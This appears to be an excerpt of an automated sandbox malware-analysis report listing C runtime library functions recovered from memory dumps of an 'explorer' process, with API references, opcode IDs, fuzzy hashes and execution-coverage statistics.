                                                                                                                                                                                                                                                    Function 0A03AC9C Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2064194629-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 23ae966139545be8ead388f17cd95bd59fdcc148465b1dd34e4ae1ed2dcd9163
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF08225B12B0D82FE18AF71F894399239AFB4A785F440D25C64E47760DE3D90619703
                                                                                                                                                                                                                                                    Function 0E8BAC9C Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2064194629-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 6560386b4bed5cc675a4ac990f9da1cce5302e16c9d0b48796a083923add1594
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59F08274711E4986FE18ABA4FCA439923A5FB45740F548C15C50E977A0DE3DE8919322
                                                                                                                                                                                                                                                    Function 0C36A940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0C36A959
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AA74: std::_Lockit::_Lockit.LIBCPMT ref: 0C36AA92
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AA74: free.LIBCMT ref: 0C36AAD0
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AA74: std::_Lockit::~_Lockit.LIBCPMT ref: 0C36AADB
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0C36A967
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B64C: _errno.LIBCMT ref: 0C36B66C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • : The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0C36A971
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                                                                    • String ID: : The expression contained an invalid character range, such as [b-a] in most encodings.
                                                                                                                                                                                                                                                    • API String ID: 161006167-2144322953
                                                                                                                                                                                                                                                    • Opcode ID: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction ID: ce98de3ba18c38651e53addfe4fd9f5520709d7a5352f37b33f8feaf8319f311
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F0A032221F0485EF18DF55F4543686364AB4CB94F69D1209A4D03718DF38C098CB00
                                                                                                                                                                                                                                                    Function 0A03A940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0A03A959
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AA74: std::_Lockit::_Lockit.LIBCPMT ref: 0A03AA92
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AA74: free.LIBCMT ref: 0A03AAD0
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AA74: std::_Lockit::~_Lockit.LIBCPMT ref: 0A03AADB
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0A03A967
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B64C: _errno.LIBCMT ref: 0A03B66C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • : The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0A03A971
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                                                                    • String ID: : The expression contained an invalid character range, such as [b-a] in most encodings.
                                                                                                                                                                                                                                                    • API String ID: 161006167-2144322953
                                                                                                                                                                                                                                                    • Opcode ID: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction ID: d67e945ff14fd1629b33e196759f16c8da42e91c328acb4aed9c445732d8b832
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0A933B11F0886DB58DF66F4943A863A8AB4DBD4F5A40218A8D03325DF3EC080CB00
                                                                                                                                                                                                                                                    Function 0E8BA940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0E8BA959
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAA74: std::_Lockit::_Lockit.LIBCPMT ref: 0E8BAA92
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAA74: free.LIBCMT ref: 0E8BAAD0
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAA74: std::_Lockit::~_Lockit.LIBCPMT ref: 0E8BAADB
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E8BA967
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB64C: _errno.LIBCMT ref: 0E8BB66C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • : The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0E8BA971
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                                                                    • String ID: : The expression contained an invalid character range, such as [b-a] in most encodings.
                                                                                                                                                                                                                                                    • API String ID: 161006167-2144322953
                                                                                                                                                                                                                                                    • Opcode ID: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction ID: e9399adec00048e8363364e8824c13391c646d2509e93a13bdb148c2c604477a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f430eb26c071bbdaa9d9e1e93cd49dd7caac4d0c622deba2a8b1250cbfe553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F06532615F4195DF19DF5AF4503A873A8EF4CBA4F5955309A5C87364DF38C890C301
                                                                                                                                                                                                                                                    Function 0C36A230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0C36A24C
                                                                                                                                                                                                                                                      • Part of subcall function 0C36CC28: std::exception::_Copy_str.LIBCMT ref: 0C36CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C36A26D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: OpenW
                                                                                                                                                                                                                                                    • API String ID: 1924332735-936580012
                                                                                                                                                                                                                                                    • Opcode ID: 13d36dd3b7175225b2150d32bea0722ca82c6d4239d7500e3e6d39f1b2e5cbb9
                                                                                                                                                                                                                                                    • Instruction ID: 21d2d6cbbbda1aefbf691f5ff4d3a21cdeec7e6e5df2baa2c843bc892478f1ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d36dd3b7175225b2150d32bea0722ca82c6d4239d7500e3e6d39f1b2e5cbb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E0BF71624B8A96DB20EB60F480789B7A4F79834CF505516E2CD46A28EF7CC24EDF01
                                                                                                                                                                                                                                                    Function 0A03A230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0A03A24C
                                                                                                                                                                                                                                                      • Part of subcall function 0A03CC28: std::exception::_Copy_str.LIBCMT ref: 0A03CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A03A26D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: OpenW
                                                                                                                                                                                                                                                    • API String ID: 1924332735-936580012
                                                                                                                                                                                                                                                    • Opcode ID: 13d36dd3b7175225b2150d32bea0722ca82c6d4239d7500e3e6d39f1b2e5cbb9
                                                                                                                                                                                                                                                    • Instruction ID: 4f3877c42cecef062fc43d1a55a991cd9c2b17be545da49f5d31fc1890068710
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d36dd3b7175225b2150d32bea0722ca82c6d4239d7500e3e6d39f1b2e5cbb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCE0BF72614B8D95DB20EF60F48479AB7A4F799348F901515D2CD46A29EB7CC24DCF01
                                                                                                                                                                                                                                                    Function 0E8BA230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0E8BA24C
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BCC28: std::exception::_Copy_str.LIBCMT ref: 0E8BCC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8BA26D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: OpenW
                                                                                                                                                                                                                                                    • API String ID: 1924332735-936580012
                                                                                                                                                                                                                                                    • Opcode ID: f7568fc86464e8da0e48488a82c16be4f4e93243b3dce7f94a7ffa75d123deb4
                                                                                                                                                                                                                                                    • Instruction ID: 6301698548829980b65e9a3745d14d40af57f3e00e5243f7f578bf9bfd9d777f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7568fc86464e8da0e48488a82c16be4f4e93243b3dce7f94a7ffa75d123deb4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35E04F71608B8AD2CB20EB64F484789A3A0F798348F800815D2CD47B28EF7CC649CF01
                                                                                                                                                                                                                                                    Function 0C36A1F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0C36A20B
                                                                                                                                                                                                                                                      • Part of subcall function 0C36CC28: std::exception::_Copy_str.LIBCMT ref: 0C36CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C36A228
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: der
                                                                                                                                                                                                                                                    • API String ID: 1924332735-371078428
                                                                                                                                                                                                                                                    • Opcode ID: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction ID: 8838f510706c6b39238390ec07f2f4602605f365f667b641ddad070237c27035
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33D0EC62114B8A92DA20DB50F440389B364F784348F905612A2CC07E1CDF7CC20ECB01
                                                                                                                                                                                                                                                    Function 0C36A1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0C36A1D3
                                                                                                                                                                                                                                                      • Part of subcall function 0C36CC28: std::exception::_Copy_str.LIBCMT ref: 0C36CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C36A1F0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: ExistsA
                                                                                                                                                                                                                                                    • API String ID: 1924332735-3619130365
                                                                                                                                                                                                                                                    • Opcode ID: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction ID: af98296e9a0b24a98d49d33b13a2be8921fbb3cd4e9cce6d7c9251b2ee1552ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8D06276124B8A92DE24DB54F440789B364F794348F805612A2CC47E68DF7CC31EDF01
                                                                                                                                                                                                                                                    Function 0A03A1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0A03A1D3
                                                                                                                                                                                                                                                      • Part of subcall function 0A03CC28: std::exception::_Copy_str.LIBCMT ref: 0A03CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A03A1F0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: ExistsA
                                                                                                                                                                                                                                                    • API String ID: 1924332735-3619130365
                                                                                                                                                                                                                                                    • Opcode ID: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction ID: 8fb83791a2548e1dc269d32269fe6769376a8c1e093f46bb493009592f76c97e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D04C76614B8E91DE24DB90F44439AB364F795348F801A12D28C57A68DBBCD219CB01
                                                                                                                                                                                                                                                    Function 0A03A1F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0A03A20B
                                                                                                                                                                                                                                                      • Part of subcall function 0A03CC28: std::exception::_Copy_str.LIBCMT ref: 0A03CC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A03A228
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: der
                                                                                                                                                                                                                                                    • API String ID: 1924332735-371078428
                                                                                                                                                                                                                                                    • Opcode ID: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction ID: 0bec39ab56ce2d31eda374efaa95d7715a9f9d87006d4e8574c51d5c53421d46
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D01273604F8E91CE20DB90F44039AB364F785348F800611D2CC07E18DBBCC219CB01
                                                                                                                                                                                                                                                    Function 0E8BA1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0E8BA1D3
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BCC28: std::exception::_Copy_str.LIBCMT ref: 0E8BCC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8BA1F0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: ExistsA
                                                                                                                                                                                                                                                    • API String ID: 1924332735-3619130365
                                                                                                                                                                                                                                                    • Opcode ID: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction ID: 2d8e986b721a100f649d7cadd26e273a1f9f03821e2b06970fa719dd008d9e48
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e9925d2b4b67c32bdf6c176dc0d19690a87b27235c2e3c5fedc67f4044d333
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBD04C66218A8A92DA24DB94F454389A364F794358F904A12928C5BE68DFBCC619CB05
                                                                                                                                                                                                                                                    Function 0E8BA1F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0E8BA20B
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BCC28: std::exception::_Copy_str.LIBCMT ref: 0E8BCC47
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8BA228
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                                    • String ID: der
                                                                                                                                                                                                                                                    • API String ID: 1924332735-371078428
                                                                                                                                                                                                                                                    • Opcode ID: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction ID: bc54bd09dbebd6d81bfd8d0b5e3259822a5e1a1c9c2561466b12bcc601d1926c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d6aff83c974dc9d361a398808428ebd2fa40761f2aa0a2620cb6bbdf17554ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0D01276108BCA92CE24DB94F45438DB364F794348F804A1192CC5BE58DFBCC609CB01

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:39.8%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:472
                                                                                                                                                                                                                                                    Total number of Limit Nodes:12
